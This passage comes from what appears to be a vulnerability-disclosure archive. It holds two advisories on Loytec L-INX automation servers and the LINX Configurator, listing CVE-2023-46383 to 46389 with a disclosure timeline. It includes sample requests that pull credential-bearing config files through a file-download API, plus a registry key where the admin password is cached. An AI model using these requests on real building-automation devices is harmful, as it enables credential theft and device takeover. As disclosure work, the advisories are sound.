/>https://hub.docker.com/r/buddho/etcd-browser/tags<br /><br />------------------------------------------<br /><br />[Discoverer]<br />Kevin Randall<br /><br /></code></pre>
<pre><code><br />[+] CVE : CVE-2023-46386, CVE-2023-46387, CVE-2023-46388, CVE-2023-46389 <br />[+] Title : Multiple vulnerabilities in Loytec L-INX Automation Servers<br />[+] Vendor : LOYTEC electronics GmbH<br />[+] Affected Product(s) : LINX-151, Firmware 7.2.4, LINX-212, firmware 6.2.4<br />[+] Affected Components : L-INX Automation Servers<br />[+] Discovery Date : 01-Sep-2021<br />[+] Publication date : 03-Nov-2023<br />[+] Discovered by : Chizuru Toyama of TXOne networks<br /><br /><br />[Vulnerability Description]<br /><br />CVE-2023-46386 : Insecure Permissions<br />'registry.xml' file contains hard-coded clear text credentials for <br /> smtp client account. If an attacker succeeds in getting registry.xml file, <br /> the email account could be compromised. Password should be encrypted.<br /><br />CVE-2023-46387 : Improper Access Control<br />'/var/lib/lgtw/dpal_config.zml' file is accessible via file download API. <br /> 'dpal_config.wbx' which is extracted from 'dpal_config.zml' includes<br />sensitive configuration information such as smtp client information. <br /> Authentication is required to exploit this vulnerability.<br />http://<IP>:<port>/DT?filename=/var/lib/lgtw/dpal_config.zml<br /><br />CVE-2023-46388 : Insecure Permissions<br />'dpal_config.wbx' file contains hard-coded clear text credentials for <br /> smtp client account. If an attacker succeeds in getting dpal_config.zml file, <br /> the email account could be compromised. Password should be encrypted.<br /><br />CVE-2023-46389 : Improper Access Control<br />'/tmp/registry.xml' file is accessible via file download API. <br /> 'registry.xml' includes device configuration information which includes<br />sensitive information such as smtp client information. Authentication is<br />required to exploit this vulnerability.<br />http://<IP>:<port>/DT?filename=/tmp/registry.xml<br /><br /><br />[Timeline]<br /><br />01-Sep-2021 : Vulnerabilities discovered<br />13-Oct-2021 : Trend Micro ZDI (Zero Day Initiative) reported to vendor (no response)<br />07-Oct-2022 : ICS CERT reported to vendor (no response)<br />03-Nov-2023 : Public Disclosure<br /><br /><br /><br /></code></pre>
<pre><code><br />[+] CVE : CVE-2023-46383, CVE-2023-46384, CVE-2023-46385 <br />[+] Title : Multiple vulnerabilities in Loytec LINX Configurator <br />[+] Vendor : LOYTEC electronics GmbH<br />[+] Affected Product(s) : LINX Configurator 7.4.10<br />[+] Affected Components : LINX Configurator<br />[+] Discovery Date : 01-Sep-2021<br />[+] Publication date : 03-Nov-2023<br />[+] Discovered by : Chizuru Toyama of TXOne networks<br /><br /><br />[Vulnerability Description]<br /><br /> CVE-2023-46383 : Insecure Permissions<br /> Loytec LINX Configurator could be connected to Loytec devices with<br /> an administrator credential, and it could configure device settings. <br /> Since it uses HTTP Basic Authentication, which transmits usernames <br /> and passwords in base64-encoded cleartext, so anyone could easily<br /> steal credentials if they sniff network traffics. Once obtaining the<br /> admin password, attackers could connect and control Loytec devices <br /> via LINX configurator.<br /> <br /> CVE-2023-46384 : Insecure Permissions <br /> Following registry key contains hard-coded clear text admin password <br /> for recently connected Loytec device. (password cache) If an attacker <br /> succeeds in getting this registry key value, attackers could connect <br /> and control Loytec devices via LINX configurator.<br /><br /> Key: Computer\HKEY_CURRENT_USER\SOFTWARE\LOYTEC\LOYTEC LINX Configurator\OhioIni<br /> Value name: ftp_pass<br /> Value dada: <admin password><br /><br /> CVE-2023-46385 : Insecure Permissions<br /> When Loytec LINX Configurator connects to a device, it sends HTTP GET <br /> request to login. Since cleartext password is passed as an URL parameter, <br /> "password" without sufficient protection, anyone could easily steal <br /> credentials if they sniff network traffics. Once obtaining the admin <br /> password, attackers could connect and control Loytec devices via LINX <br /> configurator.<br /> http://<IP>:<port>/webui/config/system?username=admin&password=<admin password>&login=Login<br /><br /><br />[Timeline]<br /><br /> 01-Sep-2021 : Vulnerabilities discovered<br /> 13-Oct-2021 : Trend Micro ZDI (Zero Day Initiative) reported to vendor (no response)<br /> 07-Oct-2022 : ICS CERT reported to vendor (no response)<br /> 03-Nov-2023 : Public Disclosure<br /><br /><br /></code></pre>